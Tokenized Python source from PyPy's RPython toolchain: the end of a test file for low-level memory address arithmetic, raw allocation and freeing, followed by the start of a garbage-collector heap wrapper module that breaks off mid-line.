'<STR_LIT:y>' , lltype . Signed ) ) <EOL> s = lltype . malloc ( S ) <EOL> SUBARRAY = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) <EOL> adr = cast_ptr_to_adr ( s ) + offsetof ( S , '<STR_LIT:y>' ) <EOL> subarray = cast_adr_to_ptr ( adr , lltype . Ptr ( SUBARRAY ) ) <EOL> subarray [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . y == <NUM_LIT> <EOL> def test_opaque ( ) : <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> O = lltype . GcOpaqueType ( '<STR_LIT:O>' ) <EOL> s = lltype . malloc ( S ) <EOL> adr = cast_ptr_to_adr ( s ) <EOL> o = cast_adr_to_ptr ( adr , lltype . Ptr ( O ) ) <EOL> assert lltype . cast_opaque_ptr ( lltype . 
Ptr ( S ) , o ) == s <EOL> adr2 = cast_ptr_to_adr ( o ) <EOL> s2 = cast_adr_to_ptr ( adr2 , lltype . Ptr ( S ) ) <EOL> assert s2 == s <EOL> def test_raw_malloc_struct ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:z>' , lltype . Signed ) ) <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , lltype . Ptr ( T ) ) ) <EOL> adr = raw_malloc ( sizeof ( S ) ) <EOL> s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> raw_memclear ( adr , sizeof ( S ) ) <EOL> assert s . x == <NUM_LIT:0> <EOL> assert lltype . typeOf ( s ) == lltype . Ptr ( S ) <EOL> s . x = <NUM_LIT> <EOL> x_adr = adr + offsetof ( S , '<STR_LIT:x>' ) <EOL> assert x_adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> x_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> def test_llinterp_raw_malloc_struct ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:z>' , lltype . Signed ) ) <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , lltype . Ptr ( T ) ) ) <EOL> size = sizeof ( S ) <EOL> def test_read_uninit ( ) : <EOL> adr = raw_malloc ( size ) <EOL> s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> return s . x <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> def test_read_init ( ) : <EOL> adr = raw_malloc ( size ) <EOL> raw_memclear ( adr , size ) <EOL> s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> return s . x <EOL> res = interpret ( test_read_init , [ ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_raw_malloc_signed ( ) : <EOL> adr = raw_malloc ( sizeof ( lltype . Signed ) ) <EOL> p = cast_adr_to_ptr ( adr , <EOL> lltype . Ptr ( lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) ) ) <EOL> p [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> adr . 
signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert p [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> def test_raw_malloc_access ( ) : <EOL> S = lltype . GcStruct ( "<STR_LIT:S>" , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( "<STR_LIT:T>" , ( '<STR_LIT:y>' , lltype . Signed ) , ( '<STR_LIT:s>' , lltype . Ptr ( S ) ) ) <EOL> p_t = lltype . malloc ( T ) <EOL> assert p_t . s == lltype . nullptr ( S ) <EOL> p_raw_t = lltype . malloc ( T , flavor = "<STR_LIT>" ) <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> p_raw_t = cast_adr_to_ptr ( raw_malloc ( sizeof ( T ) ) , lltype . Ptr ( T ) ) <EOL> py . test . raises ( lltype . UninitializedMemoryAccess , "<STR_LIT>" ) <EOL> def test_raw_malloc_signed_bunch ( ) : <EOL> adr = raw_malloc ( sizeof ( lltype . Signed ) * <NUM_LIT:50> ) <EOL> p = cast_adr_to_ptr ( adr , <EOL> lltype . Ptr ( lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:1> ) ) ) <EOL> for i in range ( <NUM_LIT:50> ) : <EOL> p [ i ] = <NUM_LIT> + i <EOL> assert adr . signed [ i ] == <NUM_LIT> + i <EOL> adr . signed [ i ] = <NUM_LIT> - i <EOL> assert p [ i ] == <NUM_LIT> - i <EOL> py . test . raises ( IndexError , "<STR_LIT>" ) <EOL> def test_raw_malloc_array ( ) : <EOL> A = lltype . Array ( lltype . Signed ) <EOL> adr = raw_malloc ( sizeof ( A , <NUM_LIT:50> ) ) <EOL> length_adr = adr + ArrayLengthOffset ( A ) <EOL> length_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT:50> <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( A ) ) <EOL> assert len ( p ) == <NUM_LIT:50> <EOL> for i in range ( <NUM_LIT:50> ) : <EOL> item_adr = adr + itemoffsetof ( A , i ) <EOL> p [ i ] = <NUM_LIT> + i <EOL> assert item_adr . signed [ <NUM_LIT:0> ] == <NUM_LIT> + i <EOL> item_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT> - i <EOL> assert p [ i ] == <NUM_LIT> - i <EOL> item_adr = adr + itemoffsetof ( A , <NUM_LIT:50> ) <EOL> py . test . 
raises ( IndexError , "<STR_LIT>" ) <EOL> def test_raw_malloc_gcstruct ( ) : <EOL> from pypy . rpython . memory import gcheader <EOL> HDR = lltype . Struct ( '<STR_LIT>' , ( '<STR_LIT:a>' , lltype . Signed ) ) <EOL> builder = gcheader . GCHeaderBuilder ( HDR ) <EOL> gchdr = builder . size_gc_header <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> def allocate ( ) : <EOL> adr = raw_malloc ( gchdr + sizeof ( S ) ) <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( HDR ) ) <EOL> p . a = - <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( p ) <EOL> sadr = adr + gchdr <EOL> s = cast_adr_to_ptr ( sadr , lltype . Ptr ( S ) ) <EOL> s . x = <NUM_LIT> <EOL> assert ( sadr + offsetof ( S , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT> <EOL> ( sadr + offsetof ( S , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert s . x == <NUM_LIT> <EOL> return s <EOL> s = allocate ( ) <EOL> adr = cast_ptr_to_adr ( s ) - gchdr <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( HDR ) ) <EOL> assert p . a == - <NUM_LIT> <EOL> def test_raw_malloc_varsize ( ) : <EOL> A = lltype . Array ( lltype . Signed ) <EOL> S = lltype . Struct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:y>' , A ) ) <EOL> adr = raw_malloc ( offsetof ( S , '<STR_LIT:y>' ) + itemoffsetof ( A , <NUM_LIT:10> ) ) <EOL> length_adr = adr + offsetof ( S , '<STR_LIT:y>' ) + ArrayLengthOffset ( A ) <EOL> length_adr . signed [ <NUM_LIT:0> ] = <NUM_LIT:10> <EOL> p = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> p . y [ <NUM_LIT:7> ] = <NUM_LIT:5> <EOL> assert ( adr + offsetof ( S , '<STR_LIT:y>' ) + itemoffsetof ( A , <NUM_LIT:7> ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:5> <EOL> ( adr + offsetof ( S , '<STR_LIT:y>' ) + itemoffsetof ( A , <NUM_LIT:7> ) ) . signed [ <NUM_LIT:0> ] = <NUM_LIT> <EOL> assert p . y [ <NUM_LIT:7> ] == <NUM_LIT> <EOL> py . test . raises ( IndexError , <EOL> "<STR_LIT>" ) <EOL> def test_raw_free ( ) : <EOL> A = lltype . 
GcArray ( lltype . Signed ) <EOL> adr = raw_malloc ( sizeof ( A , <NUM_LIT:10> ) ) <EOL> p_a = cast_adr_to_ptr ( adr , lltype . Ptr ( A ) ) <EOL> p_a [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_a ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> adr = raw_malloc ( sizeof ( S ) ) <EOL> p_s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:s>' , S ) ) <EOL> adr = raw_malloc ( sizeof ( T ) ) <EOL> p_s = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> U = lltype . Struct ( '<STR_LIT>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:u>' , U ) ) <EOL> adr = raw_malloc ( sizeof ( T ) ) <EOL> p_t = cast_adr_to_ptr ( adr , lltype . Ptr ( T ) ) <EOL> p_u = p_t . u <EOL> p_u . y = <NUM_LIT:1> <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_u ) <EOL> def test_raw_free_with_hdr ( ) : <EOL> from pypy . rpython . memory . gcheader import GCHeaderBuilder <EOL> HDR = lltype . Struct ( '<STR_LIT:h>' , ( '<STR_LIT:t>' , lltype . Signed ) ) <EOL> gh = GCHeaderBuilder ( HDR ) . size_gc_header <EOL> A = lltype . GcArray ( lltype . 
Signed ) <EOL> adr = raw_malloc ( gh + sizeof ( A , <NUM_LIT:10> ) ) <EOL> p_a = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( A ) ) <EOL> p_a [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_a ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_a ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> adr = raw_malloc ( gh + sizeof ( S ) ) <EOL> p_s = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_s ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:s>' , S ) ) <EOL> adr = raw_malloc ( gh + sizeof ( T ) ) <EOL> p_s = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( S ) ) <EOL> p_s . x = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_s ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_s ) <EOL> U = lltype . Struct ( '<STR_LIT>' , ( '<STR_LIT:y>' , lltype . Signed ) ) <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) , ( '<STR_LIT:u>' , U ) ) <EOL> adr = raw_malloc ( gh + sizeof ( T ) ) <EOL> p_t = cast_adr_to_ptr ( adr + gh , lltype . Ptr ( T ) ) <EOL> p_u = p_t . u <EOL> p_u . y = <NUM_LIT:1> <EOL> adr = cast_ptr_to_adr ( p_t ) - gh <EOL> raw_free ( adr ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> repr ( adr ) <EOL> str ( p_u ) <EOL> def test_raw_memcopy ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> t1 = lltype . malloc ( T ) <EOL> t2 = lltype . malloc ( T ) <EOL> t1 . 
x = <NUM_LIT:1> <EOL> t2 . x = <NUM_LIT:2> <EOL> at1 = cast_ptr_to_adr ( t1 ) <EOL> at2 = cast_ptr_to_adr ( t2 ) <EOL> raw_memcopy ( at1 , at2 , sizeof ( T ) ) <EOL> assert t2 . x == <NUM_LIT:1> <EOL> def test_raw_memmove ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> t1 = lltype . malloc ( T ) <EOL> t2 = lltype . malloc ( T ) <EOL> t1 . x = <NUM_LIT:1> <EOL> t2 . x = <NUM_LIT:2> <EOL> at1 = cast_ptr_to_adr ( t1 ) <EOL> at2 = cast_ptr_to_adr ( t2 ) <EOL> raw_memmove ( at1 , at2 , sizeof ( T ) ) <EOL> assert t2 . x == <NUM_LIT:1> <EOL> py . test . raises ( RuntimeError , "<STR_LIT>" ) <EOL> def test_raw_memcopy_nonrec ( ) : <EOL> T = lltype . GcStruct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> A = lltype . FixedSizeArray ( lltype . Ptr ( T ) , <NUM_LIT:1> ) <EOL> t1 = lltype . malloc ( T ) <EOL> t2 = lltype . malloc ( T ) <EOL> t1 . x = <NUM_LIT:1> <EOL> t2 . x = <NUM_LIT:2> <EOL> at1 = raw_malloc ( sizeof ( A ) ) <EOL> at2 = raw_malloc ( sizeof ( A ) ) <EOL> p1 = cast_adr_to_ptr ( at1 , lltype . Ptr ( A ) ) <EOL> p2 = cast_adr_to_ptr ( at2 , lltype . Ptr ( A ) ) <EOL> p1 [ <NUM_LIT:0> ] = t1 <EOL> p2 [ <NUM_LIT:0> ] = t2 <EOL> raw_memcopy ( at1 , at2 , sizeof ( A ) ) <EOL> assert p1 [ <NUM_LIT:0> ] == t1 <EOL> assert p2 [ <NUM_LIT:0> ] == t1 <EOL> assert t1 . x == <NUM_LIT:1> <EOL> assert t2 . x == <NUM_LIT:2> <EOL> def test_inlined_substruct ( ) : <EOL> T = lltype . Struct ( '<STR_LIT:T>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT>' , T ) , ( '<STR_LIT>' , T ) ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT>' , S1 ) , ( '<STR_LIT:t>' , T ) ) <EOL> s = lltype . malloc ( S ) <EOL> s . header . t1 . x = <NUM_LIT:1> <EOL> s . header . t2 . x = <NUM_LIT:2> <EOL> s . t . x = <NUM_LIT:3> <EOL> for adr in [ cast_ptr_to_adr ( s ) , cast_ptr_to_adr ( s . 
header ) ] : <EOL> assert ( adr + offsetof ( S , '<STR_LIT>' ) <EOL> + offsetof ( S1 , '<STR_LIT>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> assert ( adr + offsetof ( S1 , '<STR_LIT>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:1> <EOL> assert ( adr + offsetof ( S1 , '<STR_LIT>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> assert ( adr + offsetof ( S , '<STR_LIT:t>' ) <EOL> + offsetof ( T , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> def test_weakref ( ) : <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> S = lltype . GcStruct ( '<STR_LIT:S>' , ( '<STR_LIT>' , S1 ) ) <EOL> s = lltype . malloc ( S ) <EOL> s1 = lltype . cast_pointer ( lltype . Ptr ( S1 ) , s ) <EOL> w = weakref_create ( s ) <EOL> assert weakref_deref ( lltype . Ptr ( S ) , w ) == s <EOL> assert weakref_deref ( lltype . Ptr ( S1 ) , w ) == s1 <EOL> del s <EOL> import gc ; gc . collect ( ) <EOL> assert weakref_deref ( lltype . Ptr ( S1 ) , w ) == s1 <EOL> del s1 <EOL> import gc ; gc . collect ( ) <EOL> assert weakref_deref ( lltype . Ptr ( S ) , w ) == lltype . nullptr ( S ) <EOL> assert weakref_deref ( lltype . Ptr ( S1 ) , w ) == lltype . nullptr ( S1 ) <EOL> def test_generic_gcarray_of_ptr ( ) : <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT:x>' , lltype . Signed ) ) <EOL> A1 = lltype . GcArray ( lltype . Ptr ( S1 ) ) <EOL> A2 = lltype . GcArray ( lltype . Ptr ( A1 ) ) <EOL> a2 = lltype . malloc ( A2 , <NUM_LIT:3> ) <EOL> a2 [ <NUM_LIT:1> ] = lltype . malloc ( A1 , <NUM_LIT:4> ) <EOL> a2 [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] = lltype . malloc ( S1 ) <EOL> a2 [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] . x = - <NUM_LIT> <EOL> adr = cast_ptr_to_adr ( a2 ) <EOL> assert ( adr + gcarrayofptr_lengthoffset ) . 
signed [ <NUM_LIT:0> ] == <NUM_LIT:3> <EOL> adr += gcarrayofptr_itemsoffset <EOL> adr += gcarrayofptr_singleitemoffset <EOL> adr = adr . address [ <NUM_LIT:0> ] <EOL> assert ( adr + gcarrayofptr_lengthoffset ) . signed [ <NUM_LIT:0> ] == <NUM_LIT:4> <EOL> adr += gcarrayofptr_itemsoffset + <NUM_LIT:2> * gcarrayofptr_singleitemoffset <EOL> adr = adr . address [ <NUM_LIT:0> ] <EOL> assert ( adr + FieldOffset ( S1 , '<STR_LIT:x>' ) ) . signed [ <NUM_LIT:0> ] == - <NUM_LIT> <EOL> def test_raw_memclear_on_empty_array ( ) : <EOL> py . test . skip ( "<STR_LIT>" ) <EOL> A = lltype . FixedSizeArray ( lltype . Signed , <NUM_LIT:0> ) <EOL> a = lltype . malloc ( A , flavor = '<STR_LIT>' ) <EOL> src = cast_ptr_to_adr ( a ) + itemoffsetof ( A , <NUM_LIT:0> ) <EOL> raw_memclear ( src , sizeof ( lltype . Signed ) * <NUM_LIT:0> ) <EOL> def test_nonneg ( ) : <EOL> S1 = lltype . GcStruct ( '<STR_LIT>' , ( '<STR_LIT:x>' , lltype . Float ) ) <EOL> A1 = lltype . GcArray ( lltype . Float ) <EOL> assert sizeof ( S1 ) >= <NUM_LIT:0> <EOL> assert itemoffsetof ( A1 , <NUM_LIT:4> ) >= <NUM_LIT:0> <EOL> assert not ( sizeof ( S1 ) < <NUM_LIT:0> ) <EOL> assert not ( itemoffsetof ( A1 , <NUM_LIT:4> ) < <NUM_LIT:0> ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> py . test . raises ( TypeError , "<STR_LIT>" ) <EOL> def test_addr_keeps_object_alive ( ) : <EOL> A = lltype . Array ( Address ) <EOL> ptr = lltype . malloc ( A , <NUM_LIT:10> , immortal = True ) <EOL> adr = cast_ptr_to_adr ( ptr ) + ArrayItemsOffset ( A ) <EOL> del ptr <EOL> import gc ; gc . collect ( ) ; gc . collect ( ) <EOL> ptr1 = cast_adr_to_ptr ( adr , lltype . Ptr ( lltype . FixedSizeArray ( Address , <NUM_LIT:1> ) ) ) <EOL> ptr1 [ <NUM_LIT:0> ] = NULL <EOL> def test_realloc ( ) : <EOL> A = lltype . Array ( lltype . 
Float ) <EOL> adr = raw_malloc ( sizeof ( A , <NUM_LIT:10> ) ) <EOL> ptr = cast_adr_to_ptr ( adr , lltype . Ptr ( A ) ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> ptr [ i ] = float ( i ) <EOL> adr2 = raw_realloc_shrink ( adr , sizeof ( A , <NUM_LIT:10> ) , sizeof ( A , <NUM_LIT:5> ) ) <EOL> ptr2 = cast_adr_to_ptr ( adr2 , lltype . Ptr ( A ) ) <EOL> assert len ( ptr2 ) == <NUM_LIT:5> <EOL> assert ptr2 [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> assert ptr2 [ <NUM_LIT:1> ] == <NUM_LIT:1.0> <EOL> def test_realloc_struct ( ) : <EOL> S = lltype . Struct ( '<STR_LIT:x>' , ( '<STR_LIT>' , lltype . Signed ) , <EOL> ( '<STR_LIT:a>' , lltype . Array ( lltype . Float ) ) ) <EOL> adr = raw_malloc ( sizeof ( S , <NUM_LIT:5> ) ) <EOL> ptr = cast_adr_to_ptr ( adr , lltype . Ptr ( S ) ) <EOL> for i in range ( <NUM_LIT:5> ) : <EOL> ptr . a [ i ] = float ( i ) <EOL> ptr . one = <NUM_LIT:3> <EOL> adr2 = raw_realloc_grow ( adr , sizeof ( S , <NUM_LIT:5> ) , sizeof ( S , <NUM_LIT:10> ) ) <EOL> ptr2 = cast_adr_to_ptr ( adr2 , lltype . Ptr ( S ) ) <EOL> assert len ( ptr2 . a ) == <NUM_LIT:10> <EOL> assert ptr2 . a [ <NUM_LIT:3> ] == <NUM_LIT> <EOL> assert ptr2 . a [ <NUM_LIT:0> ] == <NUM_LIT:0.0> <EOL> assert ptr2 . one == <NUM_LIT:3> </s>
<s> from pypy . rpython . lltypesystem import lltype , llmemory , llheap <EOL> from pypy . rpython import llinterp <EOL> from pypy . rpython . annlowlevel import llhelper <EOL> from pypy . rpython . memory import gctypelayout <EOL> from pypy . objspace . flow . model import Constant <EOL> class GCManagedHeap ( object ) : <EOL> def __init__ ( self , llinterp , flowgraphs , gc_class , GC_PARAMS = { } ) : <EOL> translator = llinterp . typer . annotator . translator <EOL> config = translator . config . translation <EOL> self . gc = gc_class ( config , chunk_size = <NUM_LIT:10> , ** GC_PARAMS ) <EOL> self . gc . set_root_walker ( LLInterpRootWalker ( self ) ) <EOL> self . gc . DEBUG = True <EOL> self . llinterp = llinterp <EOL> self . prepare_graphs ( flowgraphs ) <EOL> self . gc . setup ( ) <EOL> def prepare_graphs ( self , flowgraphs ) : <EOL> lltype2vtable = self . llinterp . typer . lltype2vtable <EOL> layoutbuilder = DirectRunLayoutBuilder ( self . gc . __class__ , <EOL> lltype2vtable , <EOL> self . llinterp ) <EOL> self . get_type_id = layoutbuilder . get_type_id <EOL> layoutbuilder . initialize_gc_query_function ( self . gc ) <EOL> constants = collect_constants ( flowgraphs ) <EOL> for obj in constants : <EOL> TYPE = lltype . typeOf ( obj ) <EOL> layoutbuilder . consider_constant ( TYPE , obj , self . gc ) <EOL> self . constantroots = layoutbuilder . addresses_of_static_ptrs <EOL> self . constantrootsnongc = layoutbuilder . addresses_of_static_ptrs_in_nongc <EOL> self . _all_prebuilt_gc = layoutbuilder . all_prebuilt_gc <EOL> def malloc ( self , TYPE , n = None , flavor = '<STR_LIT>' , zero = False ) : <EOL> if flavor == '<STR_LIT>' : <EOL> typeid = self . get_type_id ( TYPE ) <EOL> addr = self . gc . malloc ( typeid , n , zero = zero ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , lltype . Ptr ( TYPE ) ) <EOL> if not self . gc . malloc_zero_filled : <EOL> gctypelayout . zero_gc_pointers ( result ) <EOL> return result <EOL> else : <EOL> return lltype . 
malloc ( TYPE , n , flavor = flavor , zero = zero ) <EOL> def malloc_nonmovable ( self , TYPE , n = None , zero = False ) : <EOL> typeid = self . get_type_id ( TYPE ) <EOL> if not self . gc . can_malloc_nonmovable ( ) : <EOL> return lltype . nullptr ( TYPE ) <EOL> addr = self . gc . malloc_nonmovable ( typeid , n , zero = zero ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , lltype . Ptr ( TYPE ) ) <EOL> if not self . gc . malloc_zero_filled : <EOL> gctypelayout . zero_gc_pointers ( result ) <EOL> return result <EOL> def malloc_resizable_buffer ( self , TYPE , n ) : <EOL> typeid = self . get_type_id ( TYPE ) <EOL> addr = self . gc . malloc ( typeid , n ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , lltype . Ptr ( TYPE ) ) <EOL> if not self . gc . malloc_zero_filled : <EOL> gctypelayout . zero_gc_pointers ( result ) <EOL> return result <EOL> def resize_buffer ( self , obj , old_size , new_size ) : <EOL> T = lltype . typeOf ( obj ) . TO <EOL> buf = self . malloc_resizable_buffer ( T , new_size ) <EOL> arrayfld = T . _arrayfld <EOL> new_arr = getattr ( buf , arrayfld ) <EOL> old_arr = getattr ( obj , arrayfld ) <EOL> for i in range ( old_size ) : <EOL> new_arr [ i ] = old_arr [ i ] <EOL> return buf <EOL> def finish_building_buffer ( self , obj , size ) : <EOL> return obj <EOL> def free ( self , TYPE , flavor = '<STR_LIT>' ) : <EOL> assert flavor != '<STR_LIT>' <EOL> return lltype . free ( TYPE , flavor = flavor ) <EOL> def setfield ( self , obj , fieldname , fieldvalue ) : <EOL> STRUCT = lltype . typeOf ( obj ) . TO <EOL> addr = llmemory . cast_ptr_to_adr ( obj ) <EOL> addr += llmemory . offsetof ( STRUCT , fieldname ) <EOL> self . setinterior ( obj , addr , getattr ( STRUCT , fieldname ) , fieldvalue ) <EOL> def setarrayitem ( self , array , index , newitem ) : <EOL> ARRAY = lltype . typeOf ( array ) . TO <EOL> addr = llmemory . cast_ptr_to_adr ( array ) <EOL> addr += llmemory . itemoffsetof ( ARRAY , index ) <EOL> self . 
setinterior ( array , addr , ARRAY . OF , newitem ) <EOL> def setinterior ( self , toplevelcontainer , inneraddr , INNERTYPE , newvalue ) : <EOL> if ( lltype . typeOf ( toplevelcontainer ) . TO . _gckind == '<STR_LIT>' and <EOL> isinstance ( INNERTYPE , lltype . Ptr ) and INNERTYPE . TO . _gckind == '<STR_LIT>' ) : <EOL> self . gc . write_barrier ( llmemory . cast_ptr_to_adr ( newvalue ) , <EOL> llmemory . cast_ptr_to_adr ( toplevelcontainer ) ) <EOL> llheap . setinterior ( toplevelcontainer , inneraddr , INNERTYPE , newvalue ) <EOL> def collect ( self , * gen ) : <EOL> self . gc . collect ( * gen ) <EOL> def can_move ( self , addr ) : <EOL> return self . gc . can_move ( addr ) <EOL> def weakref_create_getlazy ( self , objgetter ) : <EOL> type_id = self . get_type_id ( gctypelayout . WEAKREF ) <EOL> addr = self . gc . malloc ( type_id , None , zero = False ) <EOL> result = llmemory . cast_adr_to_ptr ( addr , gctypelayout . WEAKREFPTR ) <EOL> result . weakptr = llmemory . cast_ptr_to_adr ( objgetter ( ) ) <EOL> return llmemory . cast_ptr_to_weakrefptr ( result ) <EOL> def weakref_deref ( self , PTRTYPE , obj ) : <EOL> addr = gctypelayout . ll_weakref_deref ( obj ) <EOL> return llmemory . cast_adr_to_ptr ( addr , PTRTYPE ) <EOL> def gc_id ( self , ptr ) : <EOL> ptr = lltype . cast_opaque_ptr ( llmemory . GCREF , ptr ) <EOL> return self . gc . id ( ptr ) <EOL> class LLInterpRootWalker : <EOL> _alloc_flavor_ = '<STR_LIT>' <EOL> def __init__ ( self , gcheap ) : <EOL> self . gcheap = gcheap <EOL> def walk_roots ( self , collect_stack_root , <EOL> collect_static_in_prebuilt_nongc , <EOL> collect_static_in_prebuilt_gc ) : <EOL> gcheap = self . gcheap <EOL> gc = gcheap . gc <EOL> if collect_static_in_prebuilt_gc : <EOL> for addrofaddr in gcheap . constantroots : <EOL> if self . gcheap . gc . points_to_valid_gc_object ( addrofaddr ) : <EOL> collect_static_in_prebuilt_gc ( gc , addrofaddr ) <EOL> if collect_static_in_prebuilt_nongc : <EOL> for addrofaddr in gcheap . 
